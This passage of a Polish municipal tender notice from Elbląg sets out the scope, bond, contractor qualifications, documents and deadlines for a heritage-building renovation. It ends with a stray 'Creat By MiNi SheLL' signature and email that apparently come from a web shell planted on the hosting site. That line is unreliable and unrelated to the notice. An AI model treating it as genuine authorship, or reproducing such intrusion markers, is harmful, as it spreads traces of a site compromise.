-	instalacji wentylacji mechanicznej i klimatyzacji,
-	instalacji elektrycznych,
-	prac konserwatorskich polegających na renowacji majoliki w pracowni restauracyjnej,
-	przyłącza wod.-kan., kanalizacji deszczowej i instalacji p.poż.,
-	zagospodarowanie terenu (drogi, parkingi, dojścia, ogrodzenie, zieleń),
b)	dostawę i montaż wyposażenia w modernizowanych pomieszczeniach spełniającego warunki wyposażenia dla potrzeb gastronomii, a w szczególności:
	-	dostawę i montaż wyposażenia technologicznego,
	-	dostawę i montaż wyposażenia pracowni hotelarskich,
	-	dostawę sprzętu drobnego,
c)	wykonanie i zamontowanie tablic: informacyjnej i pamiątkowej,
d)	oznakowanie dostarczonych maszyn, urządzeń, sprzętu i wyposażenia poprzez zastosowanie plakietek informacyjnych,
e)	zapewnienie nadzoru konserwatorskiego i archeologicznego.

Szczegółowy zakres zamówienia określa dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót budowlanych wyszczególnione w pkt II.1.3) ppkt 3. ogłoszenia.


Zamawiający wymaga złożenia oświadczenia wynikającego z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych o treści:
Zgodnie z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych oświadczam, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy 
z Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.20-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:
                                              100 000,00  złotych (słownie: sto tysięcy złotych),
Wadium należy wnieść przed upływem terminu składania ofert.

	Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
-	w pieniądzu, 
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	w gwarancjach bankowych, 
-	w gwarancjach ubezpieczeniowych, 
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. Nr 109, poz. 1158, z późn. zm.).

Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy

    NR  95116022020000000061913418   w  Banku Millennium S.A. O / Elbląg

Wadium wnoszone w innej formie niż w pieniądzu należy zdeponować w sekretariacie Wydziału Finansowo - Budżetowego Urzędu Miejskiego w Elblągu

2.	Wykonawca, który nie wniesie wadium zostanie przez Zamawiającego wykluczony z postępowania.
3.	Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.	Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Warunkiem udziału w postępowaniu jest:
a)	wykonanie w sposób należyty okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, tj. wykonanie robót budowlanych polegających na budowie lub przebudowie obiektów użyteczności publicznej lub mieszkalno-usługowych, w tym:
-	co najmniej jednej roboty budowlanej dotyczącej obiektu o kubaturze minimum 10.000 m3 
oraz 
-	co najmniej jednej roboty budowlanej dotyczącej obiektu wpisanego do rejestru zabytków lub zlokalizowanego na terenie objętym nadzorem konserwatorskim o wartości co najmniej 3.000.000,00 zł netto,

b)	zatrudnianie przeciętnie w okresie ostatnich trzech lat min. 50 pracowników, 

c)	dysponowanie:
A.	kierownikiem budowy branży ogólnobudowlanej ze stażem łącznym pracy jako kierownik budowy minimum 5 lat, 
B.	kierownikiem robót ogólnobudowlanych, który odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych,
C.	kierownikami robót branżowych, tj.: robót wod.-kan., robót branży gazowej, ciepłowniczej, robót elektrycznych, instalacji wentylacji mechanicznej i klimatyzacji, robót drogowych, z których każdy ma łączny staż pracy jako kierownik robót minimum 3 lata,

	Kierownik budowy i kierownicy robót muszą posiadać wymagane uprawnienia budowlane i być członkami właściwych terytorialnie izb samorządu zawodowego.
	Funkcje kierownika budowy i kierownika robót ogólnobudowlanych może pełnić ta sama osoba.
	Funkcje kierownika robót dla różnych branż może pełnić ta sama osoba, jeżeli posiada wymagane uprawnienia.
	Zgodnie z ustawą z dnia 7 lipca 1994 r. - prawo budowlane, samodzielne funkcje techniczne w budownictwie, m.in. kierowanie budową lub innymi robotami budowlanymi, mogą wykonywać wyłącznie osoby posiadające odpowiednie wykształcenie techniczne i praktykę zawodową, stwierdzone uprawnieniami budowlanymi, będące członkami właściwych terytorialnie izb samorządu zawodowego (tekst jednolity: Dz.U. z 2006 r. Nr 156, poz. 1118 z późn.zm.).
	Zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych, robotami budowlanymi przy zabytkach nieruchomych mogą kierować tylko osoby, które spełniające wymagania określone w § 8 ust. 1 wyżej wymienionego  Rozporządzenia (Dz.U. Nr 150, poz. 1579).

oraz
D.	osobą lub osobami uprawnionymi do prowadzenia prac konserwatorskich tj. posiadającymi tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych studiów w specjalności w zakresie konserwacji zabytków oraz odbyły po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji i badania zabytków.

W dziedzinach nieobjętych programem wyższych studiów, o których mowa wyżej, prace konserwatorskie, prace restauratorskie i badania konserwatorskie mogą prowadzić osoby, które posiadają przynajmniej średnie wykształcenie w dane dziedzinie oraz odbyły co najmniej 5-letnią praktykę zawodową w zakresie konserwacji i badania zabytków.
Zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych, prace konserwatorskie, prace restauratorskie lub badania konserwatorskie mogą prowadzić osoby spełniające wymagania określone w § 7 ust. 1 i 2 wyżej wymienionego Rozporządzenia (Dz.U. Nr 150, poz. 1579).
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Warunkiem udziału w postępowaniu jest:
a)	wykazanie średniego rocznego przychodu ze sprzedaży netto za okres ostatnich 3 lat obrotowych w wysokości nie mniejszej niż 6 000 000,00 zł,

b)	dysponowanie własnymi środkami finansowymi w wysokości nie mniejszej niż 1.000 000,00 zł lub zdolnością kredytową w wysokości nie mniejszej niż 1.000 000,00 zł,

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt. VI. ppkt 1.2. SIWZ
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.3. SIWZ
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt. VI. ppkt 1.4. SIWZ
4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt c) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.5., 1.6. i 1.7.  SIWZ
5) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.8. SIWZ
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
6) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ppkt b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt. VI. ppkt 1.9. SIWZ
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
7) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:
-    zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-  zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-   zgodnie z pkt VI. ppkt 1.3. SIWZ - Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie.
Uwaga:
a)	W wykazie należy wymienić roboty potwierdzające spełnienie przez Wykonawcę warunku określonego w Sekcji III.2) ppkt 2.a) ogłoszenia.
b)	W przedmiocie zamówienia należy podać informacje o kubaturze, rodzaju obiektu, wpisaniu do rejestru zabytków lub lokalizacji na terenie objętym nadzorem konserwatorskim, wartości roboty budowlanej.
c)	Dla robót wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te roboty zostały wykonane należycie,
d)	 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) ppkt 2.a) ogłoszenia.
-  zgodnie z pkt VI. ppkt 1.4. SIWZ - Informacja na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2)  ppkt 2.b) ogłoszenia.
-   zgodnie z pkt VI. ppkt 1.5. SIWZ - Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Uwaga:
a) Na potwierdzenie spełniania warunku określonego w Sekcji III.2) ppkt 2. c) ogłoszenia w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca dysponuje lub będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W doświadczeniu kierownika budowy branży ogólnobudowlanej należy podać liczbę lat stażu łącznego pracy jako kierownik budowy.
c)	W doświadczeniu kierownika robót ogólnobudowlanych należy podać liczbę lat stażu łącznego pracy jako kierownik robót oraz liczbę lat praktyki zawodowej odbytej na budowie przy zabytkach nieruchomych.
d)	W doświadczeniu kierowników robót branżowych tj.: robót wod.-kan., robót branży gazowej, ciepłowniczej, robót elektrycznych, instalacji wentylacji mechanicznej i klimatyzacji, robót drogowych, należy podać odpowiednio liczbę lat łącznego stażu pracy jako: kierownik robót wod.-kan., robót branży gazowej, ciepłowniczej, robót elektrycznych, instalacji wentylacji mechanicznej i klimatyzacji, robót drogowych.
e)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
-  zgodnie z pkt VI. ppkt 1.6. SIWZ - Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób Wykonawca wskazał osoby, którymi będzie dysponował.
Uwaga:
a)	Dokumenty składa ten Wykonawca, który w wykazie osób wskazał osoby, którymi będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
-  zgodnie z pkt VI. ppkt 1.7. SIWZ - Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Uwaga:
a)	Dla osób wymienionych w wykazie osób, o którym mowa w pkt VI. ppkt 1.5. SIWZ, oprócz osoby lub osób uprawnionych do prowadzenia prac konserwatorskich, należy złożyć z ofertą dokumenty: decyzje o nadaniu uprawnień oraz aktualne zaświadczenia o przynależności do właściwej okręgowej izby samorządu zawodowego, a dla osoby kierownika robót ogólnobudowlanych dodatkowo oświadczenie lub inny dokument potwierdzający spełnienie warunku odbycia co najmniej 2-letniej praktyki zawodowej na budowie przy zabytkach nieruchomych.
b)	Dla osoby lub osób uprawnionych do prowadzenia prac konserwatorskich złożyć z ofertą oświadczenie lub inny dokument potwierdzający posiadanie tytułu zawodowego magistra uzyskanego po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych studiów w specjalności w zakresie konserwacji zabytków oraz odbycie po ukończeniu tych studiów co najmniej 12-miesięcznej praktyki zawodowej w zakresie konserwacji i badania zabytków, a w przypadku dziedzin nieobjętych programem wyższych studiów, o których mowa wyżej, posiadanie przynajmniej średniego wykształcenia w danej dziedzinie oraz odbycie co najmniej 5-letniej praktyki zawodowej w zakresie konserwacji i badania zabytków. 
c)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.
- zgodnie z pkt VI. ppkt 1.8. SIWZ - Części sprawozdania finansowego, tj. Rachunku zysków i strat a jeżeli część ta podlega badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o tej części sprawozdania finansowego, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
	Uwaga:
a) Wyżej wymienione dokumenty Wykonawcy składają za ostatnie 3 lata obrotowe, za które Wykonawcy mają sporządzone sprawozdanie finansowe i które byli zobligowani wykonać.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2)  ppkt 3.a) ogłoszenia.
- zgodnie z pkt VI. ppkt 1.9. SIWZ - Informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) ppkt 3.b) ogłoszenia.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
UWAGA:
1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125
82-300 Elbląg ul. Łączności 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA	
         data rozpoczęcia: 	data udzielenia zamówienia
         data zakończenia: 	16 sierpnia 2010 r.
2. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.

Creat By MiNi SheLL
Email: jattceo@gmail.com